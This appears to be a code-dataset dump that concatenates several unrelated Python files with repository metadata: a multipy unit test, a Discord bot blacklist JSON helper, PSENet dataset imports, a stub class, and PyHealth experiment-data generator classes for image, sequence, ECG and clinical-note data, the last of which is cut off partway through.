ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9
|
[
"MIT"
] | null | null | null |
tests/Transform/test_Transform__diffusive_flux_mass_molar_to_mass_mass.py
|
kamilazdybal/multipy
|
ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9
|
[
"MIT"
] | null | null | null |
tests/Transform/test_Transform__diffusive_flux_mass_molar_to_mass_mass.py
|
kamilazdybal/multipy
|
ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import multipy
################################################################################
################################################################################
####
#### Class: Transform
####
################################################################################
################################################################################
class Transform(unittest.TestCase):
def test_Transform__diffusive_flux_mass_molar_to_mass_mass__allowed_calls(self):
X = np.random.rand(5,100)
Y = np.random.rand(5,100)
try:
transform = multipy.Transform()
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
(n_species_1,n_species_2,n_observations) = np.shape(B_ou)
self.assertTrue(n_species_1==4)
self.assertTrue(n_species_2==4)
self.assertTrue(n_observations==100)
except Exception:
self.assertTrue(False)
X = np.random.rand(2,100)
Y = np.random.rand(2,100)
try:
transform = multipy.Transform()
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
(n_species_1,n_species_2,n_observations) = np.shape(B_ou)
self.assertTrue(n_species_1==1)
self.assertTrue(n_species_2==1)
self.assertTrue(n_observations==100)
except Exception:
self.assertTrue(False)
X = np.random.rand(2,1)
Y = np.random.rand(2,1)
try:
transform = multipy.Transform()
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
(n_species_1,n_species_2,n_observations) = np.shape(B_ou)
self.assertTrue(n_species_1==1)
self.assertTrue(n_species_2==1)
self.assertTrue(n_observations==1)
except Exception:
self.assertTrue(False)
################################################################################
################################################################################
def test_Transform__diffusive_flux_mass_molar_to_mass_mass__not_allowed_calls(self):
transform = multipy.Transform()
X = np.random.rand(1,100)
Y = np.random.rand(1,100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
X = np.random.rand(5,100)
Y = np.random.rand(4,100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
X = np.random.rand(5,100)
Y = np.random.rand(1,100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
X = np.random.rand(1,100)
Y = np.random.rand(5,100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
X = np.random.rand(100)
Y = np.random.rand(5,100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
X = np.random.rand(5,100)
Y = np.random.rand(100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
X = np.random.rand(5,100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, [1,2,3,4,5])
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, None)
Y = np.random.rand(5,100)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass([1,2,3,4,5], Y)
with self.assertRaises(ValueError):
B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(None, Y)
################################################################################
################################################################################
def test_Transform__diffusive_flux_mass_molar_to_mass_mass__computation(self):
pass
################################################################################
################################################################################
def test_Transform__diffusive_flux_mass_molar_to_mass_mass__inverses(self):
pass
################################################################################
################################################################################
| 35.160305
| 88
| 0.506079
| 506
| 4,606
| 4.268775
| 0.094862
| 0.074074
| 0.111111
| 0.20463
| 0.909722
| 0.863426
| 0.863426
| 0.862963
| 0.862963
| 0.862963
| 0
| 0.029822
| 0.20647
| 4,606
| 130
| 89
| 35.430769
| 0.561149
| 0.003474
| 0
| 0.717949
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.282051
| 1
| 0.051282
| false
| 0.025641
| 0.038462
| 0
| 0.102564
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c74bd4ff416dfff1676d4a89fc72fea46c671413
| 574
|
py
|
Python
|
helpers/json_manager.py
|
xxopcode90xx/DiscordChatBotProject
|
d9577fabe9d5b57ad31c36a6abcc8c907a15c69d
|
[
"Apache-2.0"
] | 491
|
2020-05-31T07:24:46.000Z
|
2022-03-31T21:56:40.000Z
|
helpers/json_manager.py
|
hhhhhhhhhhh22/unicorn
|
2f3e6ed3de993c793b541d1ca84b06609f0a4f9a
|
[
"Apache-2.0"
] | 51
|
2020-05-28T23:23:49.000Z
|
2022-03-13T13:35:01.000Z
|
helpers/json_manager.py
|
hhhhhhhhhhh22/unicorn
|
2f3e6ed3de993c793b541d1ca84b06609f0a4f9a
|
[
"Apache-2.0"
] | 175
|
2020-02-04T03:59:21.000Z
|
2022-03-30T00:09:19.000Z
|
import json
def add_user_to_blacklist(user_id: int):
with open("blacklist.json", "r+") as file:
file_data = json.load(file)
file_data["ids"].append(user_id)
with open("blacklist.json", "w") as file:
file.seek(0)
json.dump(file_data, file, indent=4)
def remove_user_from_blacklist(user_id: int):
with open("blacklist.json", "r") as file:
file_data = json.load(file)
file_data["ids"].remove(user_id)
with open("blacklist.json", "w") as file:
file.seek(0)
json.dump(file_data, file, indent=4)
| 28.7
| 46
| 0.62892
| 88
| 574
| 3.920455
| 0.295455
| 0.13913
| 0.197101
| 0.243478
| 0.852174
| 0.852174
| 0.852174
| 0.852174
| 0.852174
| 0.852174
| 0
| 0.008969
| 0.222997
| 574
| 19
| 47
| 30.210526
| 0.764574
| 0
| 0
| 0.533333
| 0
| 0
| 0.116725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.066667
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c7b7c2481d60d51b4ac7d84a7ce49dfce7550bab
| 216
|
py
|
Python
|
dataset/__init__.py
|
sunchengrong/PSENet
|
adb1a6e62d858b368449c26fcddebc3147efef8b
|
[
"Apache-2.0"
] | 25
|
2020-02-29T12:14:10.000Z
|
2020-04-24T07:56:06.000Z
|
dataset/__init__.py
|
sunchengrong/PSENet
|
adb1a6e62d858b368449c26fcddebc3147efef8b
|
[
"Apache-2.0"
] | 33
|
2020-12-10T19:15:39.000Z
|
2022-03-12T00:17:30.000Z
|
dataset/__init__.py
|
sunchengrong/PSENet
|
adb1a6e62d858b368449c26fcddebc3147efef8b
|
[
"Apache-2.0"
] | 4
|
2020-02-29T12:14:18.000Z
|
2020-04-12T12:26:50.000Z
|
from dataset.icdar2015_loader import IC15Loader
from dataset.icdar2015_test_loader import IC15TestLoader
from dataset.ctw1500_loader import CTW1500Loader
from dataset.ctw1500_test_loader import CTW1500TestLoader
| 43.2
| 57
| 0.888889
| 26
| 216
| 7.153846
| 0.423077
| 0.236559
| 0.215054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0.092593
| 216
| 5
| 58
| 43.2
| 0.806122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c7b864ca14a3bc9daafa90eb5dc006358813829f
| 172
|
py
|
Python
|
client/client.py
|
areed1192/tcg-player-api
|
93f7de10dee876955d1ef8a2777735343c887c9e
|
[
"MIT"
] | 26
|
2020-09-09T14:58:02.000Z
|
2022-03-11T14:50:16.000Z
|
client/client.py
|
areed1192/tcg-player-api
|
93f7de10dee876955d1ef8a2777735343c887c9e
|
[
"MIT"
] | 1
|
2020-10-11T10:02:22.000Z
|
2020-10-11T10:02:22.000Z
|
client/client.py
|
areed1192/tcg-player-api
|
93f7de10dee876955d1ef8a2777735343c887c9e
|
[
"MIT"
] | 16
|
2020-12-15T17:30:05.000Z
|
2022-03-08T08:55:38.000Z
|
from typing import List
from typing import Dict
from typing import Union
class MyNewClass():
def __init__(self):
pass
def __repr__(self):
pass
| 12.285714
| 24
| 0.662791
| 22
| 172
| 4.818182
| 0.590909
| 0.283019
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.284884
| 172
| 13
| 25
| 13.230769
| 0.861789
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.375
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
c7b87b9edd9ad1bc77c2956fe759474d59a68451
| 30,773
|
py
|
Python
|
pyhealth/data/expdata_generator.py
|
Abhinav43/PyHealth
|
5aa9816f76990d221d79340b331c18dfa10adcb3
|
[
"BSD-2-Clause"
] | 485
|
2020-08-03T20:04:21.000Z
|
2022-02-25T13:35:43.000Z
|
pyhealth/data/expdata_generator.py
|
Abhinav43/PyHealth
|
5aa9816f76990d221d79340b331c18dfa10adcb3
|
[
"BSD-2-Clause"
] | 6
|
2020-08-06T01:07:45.000Z
|
2021-10-15T21:49:42.000Z
|
pyhealth/data/expdata_generator.py
|
Abhinav43/PyHealth
|
5aa9816f76990d221d79340b331c18dfa10adcb3
|
[
"BSD-2-Clause"
] | 98
|
2020-08-04T01:04:38.000Z
|
2022-02-09T10:36:03.000Z
|
# -*- coding: utf-8 -*-
# Author: Zhi Qiao <mingshan_ai@163.com>
# License: BSD 2 clause
import os
import csv
import pickle
import random
import numpy as np
import pandas as pd
import tqdm
from tqdm._tqdm import trange
import time
try:
from ..utils.check import *
except:
from pyhealth.utils.check import *
class imagedata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for CMS'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, (default='')
use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
all_list.append([concrete_path] + row[1:].astype(float).tolist())
label_n = len(row[1:])
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(item[0])
y_list.append(np.array(item[1:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
class sequencedata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for MIMIC'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='phenotyping',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, optional (default='')
if data_root=='', use data in ./datasets; else use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
seq_l, feat_n_all = pd.read_csv(concrete_path).shape
if seq_l < 2:
continue
all_list.append([concrete_path] + [seq_l] + row[1:].astype(float).tolist())
label_n = len(row[1:])
feat_n = feat_n_all - 1
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
l_list = []
for item in all_list:
x_list.append(item[0])
l_list.append(item[1])
y_list.append(np.array(item[2:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
training_l = l_list[: int(train_ratio * N)]
validing_l = l_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_l = l_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
pickle.dump(training_l, open(
os.path.join(self.expdata_dir, 'train_l.pkl'), 'wb'))
pickle.dump(validing_l, open(
os.path.join(self.expdata_dir, 'valid_l.pkl'), 'wb'))
pickle.dump(testing_l, open(
os.path.join(self.expdata_dir, 'test_l.pkl'), 'wb'))
print ('finished L generate')
expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'feat_n': feat_n,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'l': training_l,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
'feat_n': feat_n, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
training_l = pickle.load(open(
os.path.join(self.expdata_dir, 'train_l.pkl'), 'rb'))
validing_l = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_l.pkl'), 'rb'))
testing_l = pickle.load(open(
os.path.join(self.expdata_dir, 'test_l.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
feat_n = expdata_statistic['feat_n']
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'l': training_l,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
'feat_n': feat_n, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('l_data', self.train['l'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('l_data', self.valid['l'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
print('l_data', self.test['l'][:k])
class ecgdata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for ECG'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, optional (default='')
if data_root=='', use data in ./datasets; else use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
feat_seq = pickle.load(open(os.path.join(data_root, 'x_data', 'feat.pkl'), 'rb'))
label_seq = pickle.load(open(os.path.join(data_root, 'y_data', self.sel_task + '.pkl'), 'rb'))
label_n = np.shape(label_seq)[1]
feat_n = np.shape(feat_seq)[1]
for cur_i, each_label in enumerate(label_seq):
all_list.append(each_label.tolist() + feat_seq[cur_i].tolist())
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(np.array(item[label_n:]).astype(float))
y_list.append(np.array(item[:label_n]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'feat_n': feat_n,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y,
'feat_n': feat_n, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
feat_n = expdata_statistic['feat_n']
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y,
'feat_n': feat_n, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
class textdata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for Clinical Notes'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, (default='')
use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
all_list.append([concrete_path] + row[1:].astype(float).tolist())
label_n = len(row[1:])
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(item[0])
y_list.append(np.array(item[1:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
